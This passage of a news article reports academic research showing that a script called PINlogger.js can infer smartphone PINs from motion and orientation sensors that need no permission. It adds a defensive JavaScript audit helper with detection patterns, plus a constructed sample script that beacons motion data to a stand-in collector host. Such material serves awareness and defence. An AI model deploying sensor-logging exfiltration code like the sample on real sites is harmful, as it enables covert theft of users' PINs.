This novel attack technique was discovered and explored by a team of scientists from the University of Newcastle in the UK, who say the script can collect data from around 25 sensors, which together allow an attacker to infer what the user types on his device.
Not all sensors are restricted by OS permissions
The attack is successful because mobile operating systems do not restrict applications, such as browsers, from accessing all these sensors.
The current built-in permissions model asks users to grant an app access to sensors such as GPS, camera, or microphone, but not to data from the phone’s accelerometer, gyroscope, proximity, NFC, and rotation sensors.
Due to lowering costs, these sensors are now becoming a common feature in modern smartphones, but mobile operating systems are lagging behind.
If the user allows the browser or a tainted app to run in the background of his phone, while using another app, the PINlogger.js script will continue to collect sensor data. If at any point the user enters PINs or passwords, PINlogger.js records the data and sends it to an attacker’s server.
The more sensors the phone is equipped with, the more data the attacker has at his disposal to deduce what the user has typed.
“It’s a bit like doing a jigsaw – the more pieces you put together the easier it is to see the picture,” says Dr. Siamak Shahandashti, a Senior Research Associate in the School of Computing Science and one of the researchers who worked on the study.
Attackers can guess PINs with a high degree of accuracy
Just by listening to motion and orientation sensor streams, which do not require special permissions to access, researchers said that an artificial neural network they trained was able to crack four-digit numerical PINs on the first try with 74% accuracy, based on the data logged from 50 user devices.
The accuracy grew to 86% and 94% when the neural network was allowed a second and third try, respectively. Further, the algorithm could also be adapted to handle full alpha-numerical characters.
According to researchers, the entire point of their research was to raise awareness of the vast number of smartphone sensors that applications can access and that mobile OS vendors haven’t yet included in their standard permissions model.
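An added example, not taken from the researchers' paper or from PINlogger.js: a small audit helper a site owner could run over third-party script source to flag code that subscribes to the motion and orientation events described above and also contains a network-sending call. The event names and network APIs are standard browser APIs; the pattern lists, function names and sample scripts are constructed for illustration and are heuristic, not exhaustive.

```javascript
// Added example: static audit heuristic for scripts that read motion/orientation
// sensors (no permission prompt, per the article) and can also send data out.
const SENSOR_PATTERNS = [
  { name: 'devicemotion', re: /addEventListener\s*\(\s*['"`]devicemotion['"`]/ },
  { name: 'deviceorientation', re: /addEventListener\s*\(\s*['"`]deviceorientation(?:absolute)?['"`]/ },
  { name: 'ondevicemotion', re: /\.ondevicemotion\s*=/ },
  { name: 'ondeviceorientation', re: /\.ondeviceorientation(?:absolute)?\s*=/ },
];
const SINK_PATTERNS = [
  { name: 'fetch', re: /\bfetch\s*\(/ },
  { name: 'XMLHttpRequest', re: /new\s+XMLHttpRequest\b/ },
  { name: 'sendBeacon', re: /\bsendBeacon\s*\(/ },
  { name: 'WebSocket', re: /new\s+WebSocket\s*\(/ },
];

// Heuristic comment stripping so commented-out code does not trigger a finding.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '').replace(/(^|[^:'"`])\/\/.*$/gm, '$1');
}

function auditScript(name, src) {
  const code = stripComments(src);
  const sensors = SENSOR_PATTERNS.filter(p => p.re.test(code)).map(p => p.name);
  const sinks = SINK_PATTERNS.filter(p => p.re.test(code)).map(p => p.name);
  // Sensor use alone is common (games, maps); sensor use plus a network
  // sink in the same script is what deserves manual review.
  const verdict = sensors.length === 0 ? 'ok' : sinks.length ? 'review' : 'sensor-only';
  return { name, sensors, sinks, verdict };
}

// Constructed sample inputs (illustrative only).
const SAMPLES = {
  'analytics.js': "window.addEventListener('devicemotion', e => buf.push(e.acceleration));\n" +
                  "setInterval(() => navigator.sendBeacon('https://collector.example/m', JSON.stringify(buf)), 5000);",
  'tilt-game.js': "window.ondeviceorientation = e => paddle.move(e.gamma); // no network use",
  'carousel.js':  "// window.addEventListener('devicemotion', shake)\nfetch('/slides.json').then(render);",
};

function auditAll(samples) {
  return Object.entries(samples).map(([n, s]) => auditScript(n, s));
}

console.log(auditAll(SAMPLES));
```

A `review` verdict means only that both patterns appear in the same file; it is a prompt for manual inspection, not proof of misuse.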
Some browser vendors have implemented fixes
Similarly, starting with iOS 9.3 (March 2016), Apple implemented a similar restriction for Safari. The issue remains unresolved in Chrome.
In the future, researchers would like to see mitigation solutions at the OS level, rather than in applications.
The full research paper was published today in the International Journal of Information Security, and is entitled “Stealing PINs via mobile sensors: actual risk versus user perception.” At the top of this article there is a video of PINlogger.js collecting sensor data from an iOS device.